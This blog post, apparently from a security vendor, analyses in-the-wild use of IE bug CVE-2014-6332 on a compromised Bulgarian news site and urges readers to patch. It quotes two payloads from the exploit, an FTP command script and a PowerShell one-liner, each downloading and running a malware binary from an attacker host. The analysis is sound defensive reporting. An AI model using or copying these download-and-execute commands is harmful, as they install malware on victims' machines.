Unicorn bug first exploit 'in the wild'

Microsoft released a patch last week for a critical vulnerability allowing remote code execution in Internet Explorer. This vulnerability, known as Unicorn bug CVE-2014-6332, and discovered by an IBM X-Force security researcher, is significant because it exploits an old bug present in Internet Explorer versions 3 through 11. This means that most, if not all, Internet Explorer users are vulnerable unless they are using patched systems. It gets worse: the vulnerability not only can be used by an attacker to run arbitrary code on a remote machine, but it can also bypass the Enhanced Protected Mode (EPM) sandbox in IE11 as well as Microsoft’s free anti-exploitation tool, the Enhanced Mitigation Experience Toolkit (EMET).

Earlier this week, a proof-of-concept (PoC) successfully exploiting this vulnerability on Internet Explorer was made publicly available. In fact, this PoC showed that arbitrary code could be run on a machine merely by visiting a specially crafted website, if using an unpatched version of Internet Explorer. It was thus only a matter of time before we started seeing this vulnerability actively used as part of a cybercriminal campaign. Scouring our data, we found several blocked exploitation attempts while our users were browsing a major Bulgarian website. As you might have guessed, the compromised website was using CVE-2014-6332 to install malware on the computers of its unsuspecting visitors.

Compromised Website details

This news agency website, ranked among the 50 most visited websites in Bulgaria and among the 11,000 first worldwide according to Alexa, might just be part of the first significant in-the-wild use of this vulnerability. As far as we can tell, there is only one page on the website that has been compromised and is serving this exploit, possibly indicating a testing phase. The page is about some TV Reality show winners.

The page source contains an invisible HTML iframe pointing to the exploit:

As seen above, the exploit is hosted on the domain natmasla[.]ru. It is detected by ESET as Win32/Exploit.CVE-2014-6332.A.

The exploit is based on proof-of-concept code published by a Chinese researcher. Here are the credits in this original proof-of-concept:

It is easily modifiable and allows the attacker to write the payload in VBScript.

Strangely, the exploit is actually present two times consecutively. The first time, the payload is:

cd %TEMP%&
@echo open carolinasregion.org>%TEMP%\KdFKkDls.txt&
@echo vbs@carolinasregion.org>>%TEMP%\KdFKkDls.txt&
@echo [REDACTED]>>%TEMP%\KdFKkDls.txt&
@echo binary>>%TEMP%\KdFKkDls.txt&
@echo get natmasla.exe>>%TEMP%\KdFKkDls.txt&
@echo ! natmasla.exe>>%TEMP%\KdFKkDls.txt&
@echo ! del natmasla.exe>>%TEMP%\KdFKkDls.txt&
@echo bye>>%TEMP%\KdFKkDls.txt&
ftp -s:%TEMP%\KdFKkDls.txt&
del %TEMP%\KdFKkDls.txt

It is basically a series of commands that will be executed in the context of cmd.exe. The first group, prefixed by @echo, will write the commands in a text file (“KdFKkDls.txt”, but the name is different each time one pulls the exploit). Then the file is passed to the ftp command. It will connect to an ftp server with a username/password, download a binary, and execute it.
In the second case, the payload is:

powershell.exe (New-Object System.Net.WebClient).DownloadFile('hxxp://natmasla[.]ru/ath/sploit/natmasla.exe','%TEMP%\natmasla.exe');(New-Object -com Shell.Application).ShellExecute('%TEMP%\natmasla.exe')

This time it uses PowerShell to download a binary payload, which is actually the same as the one downloaded by the first payload.

During our investigation we observed some network difficulties when we tried to fetch the exploit. That could be the reason for the two payloads with different network resources.
The downloaded binary is detected by ESET as Win32/IRCBot.NHR. This malware has numerous capabilities, as launching DDoS attacks, or opening remote shells for the miscreants. As a funny fact, it contains an Einstein's citation "Anyone who has never made a mistake has never tried anything new."

Conclusion

Although we were not able to link this particular incident to a known exploit kit, it is a matter of time before mainstream kits integrate this vulnerability. Since all supported versions of Windows were vulnerable to this exploit before the patch was released last week, we can expect this vulnerability conversion rate to be very high. If you haven’t updated Internet Explorer yet, please take time do it right now through Windows Update.